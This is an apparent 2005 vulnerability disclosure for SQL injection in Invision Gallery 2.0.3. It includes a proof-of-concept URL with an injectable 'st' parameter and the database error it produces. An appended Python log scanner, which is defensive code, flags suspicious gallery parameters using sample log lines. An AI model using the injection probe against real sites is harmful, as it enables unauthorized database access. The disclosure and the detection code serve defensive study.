From: almaster_(at)_hotmail.com <almaster_(at)_hotmail.com>
Date: 01.11.2005
Subject: SQL In Invision Gallery 2.0.3

Credit: By aLMaSTeR HaCKeR [ almaster@hotmail.com]

Vulnerable: Invision Gallery 2.0.3

EXPLOIT:

http://www.site.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st=
|aLMaSTeR

The Error:

mySQL query error: SELECT i.*, m.members_display_name AS name, m.id AS mid, r.id as rated
               FROM ibf_gallery_images i   
                   LEFT JOIN ibf_members m ON ( m.id=i.member_id )
                   LEFT JOIN ibf_gallery_ratings r ON ( r.img_id=i.id AND r.member_id=0 )
               WHERE  category_id=26   AND  i.approved=1      
                   GROUP BY i.id
               ORDER BY pinned DESC, date DESC , i.id DESC  LIMIT ', 20
               

SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '', 20' at line 7
SQL error code:
Date: Sunday 30th of October 2005 04:53:19 PM

Thanks TO MY FRIENDS IN S4A.CC

almaster@s4a.cc or almaster@hotmail.com
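
A defensive check for the issue reported above, added here as an example and not part of the original post or of the Invision Gallery code: it scans web-server access logs for gallery requests whose st, cat or prune_key value is not a plain integer, which is what reached the LIMIT clause in the error output. The combined log format, the sample lines and the integer-only rule for these three parameters are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters that carry integer values in the advisory's URL; treating them
# as integer-only is an assumption of this example.
NUMERIC_PARAMS = ("cat", "prune_key", "st")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def check_request(target):
    """Return (name, value) pairs that are not plain non-negative integers
    for a request to the gallery module; [] for any other request."""
    query = parse_qs(urlsplit(target).query)  # percent-decodes the values
    if query.get("automodule") != ["gallery"]:
        return []
    bad = []
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if not re.fullmatch(r"[0-9]{1,10}", value):
                bad.append((name, value))
    return bad


def scan(lines):
    """Yield (line_number, findings) for each log line with a suspicious value."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = check_request(match.group(1))
            if findings:
                yield number, findings


# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Oct/2005:16:53:01 +0000] "GET /index.php?automodule=gallery'
    '&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st=20 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [30/Oct/2005:16:53:19 +0000] "GET /index.php?automodule=gallery'
    '&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st=%27 HTTP/1.1" 200 1843',
    '192.0.2.10 - - [30/Oct/2005:16:54:02 +0000] "GET /index.php?act=idx&st=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The same integer-only rule is what the application itself needs to enforce on st before the value is placed in the LIMIT clause.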
